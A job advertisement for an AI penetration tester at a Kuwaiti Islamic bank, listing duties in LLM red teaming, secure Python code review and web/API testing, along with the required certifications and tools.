For a well-known Islamic Bank in Kuwait, we are hiring an AI Penetration Tester to join VMPT team and lead hands-on security testing for LLM/GenAI, ML, and AI-enabled applications (chatbots, RAG, AI agents, model APIs, and AI-assisted business workflows). The role blends traditional penetration testing + secure code review + vulnerability assessment with AI red teaming focused on modern AI risks such as prompt injection and insecure output handling as documented by OWASP's Top 10 for LLM Applications.
Candidate is expected to have experience in assessing Python-based AI development and Azure AI / Azure OpenAI / Microsoft Foundry-hosted model endpoints.
Key Responsibilities
AI / LLM penetration Testing & Red Teaming
- Plan and execute AI penetration tests for LLM/GenAI and ML solutions across the bank (AI apps, AI gateways, model endpoints, orchestration layers, RAG pipelines, plugins/tools).
- Design test cases aligned to OWASP Top 10 for LLM Applications (e.g., prompt injection, insecure output handling, sensitive info disclosure, supply-chain risks).
- Perform adversarial testing using threat-informed techniques and references such as MITRE ATLAS (adversary tactics/techniques for AI systems).
- Validate security of agentic workflows (tool invocation, function calling, permissions, memory, connectors) and verify least privilege + authorization boundaries.
Automation & Tooling
- Build Python-based test harnesses for repeatable AI security testing (fuzzing prompts, jailbreak suites, regression tests, evaluation scoring).
- Use and extend PyRIT (Python Risk Identification Tool) or equivalent frameworks to probe for jailbreaks/harms and automate adversarial scanning.
- Where applicable, leverage Microsoft Foundry capabilities such as the AI Red Teaming Agent (preview) that integrates PyRIT red teaming features.
Secure code review & AppSec
- Conduct secure code review (particularly Python) for AI application layers: prompt templates, RAG retrieval logic, output post-processing, input validation, secrets handling, authZ checks, and logging.
- Identify and help fix design flaws enabling data leakage, prompt manipulation, unsafe tool usage, or insecure output flows.
Traditional PT
- Perform web/API/cloud penetration testing for AI-enabled applications (auth, session, API abuse, SSRF, injection, misconfigurations, secrets).
- Run vulnerability assessments, triage findings, define severity, and validate remediation (re-test).
Education and Qualification
- Bachelor's degree in computer science, Cybersecurity, Software Engineering, or related discipline.
- 3–7 years in penetration testing / application security / red teaming.
- Demonstrated experience testing LLM/GenAI systems (prompt injection, jailbreaks, data exfiltration patterns, agent/tool abuse).
- Strong hands-on Python for security automation and test harness development.
- Practical experience with Azure security concepts (identity, networking, secrets, logging) and exposure to Azure AI / Azure OpenAI / Foundry style deployments.
- Strong report writing, clear communication, ability to work with developers on remediation.
A Must Certificates (at least one)
- OffSec OSCP / OSCP+
- GIAC GPEN
- Microsoft Certified: Azure Security Engineer Associate (AZ-500)
- ISC2 CCSP
Strongly Preferred
- OffSec OSWE (advanced web exploitation / white-box testing)
- Burp Suite Certified Practitioner (BSCP)
- Microsoft Certified: Azure AI Engineer Associate (AI-102) (helps align with Azure AI implementation patterns).
Tools & Technologies Skills
- Python, Git, CI/CD integration
- Burp Suite, common PT toolchains (Kali, scanners, API tooling)
- Azure security controls (identity, key management, logging/monitoring)
- AI red teaming tooling (e.g., PyRIT / Foundry scans)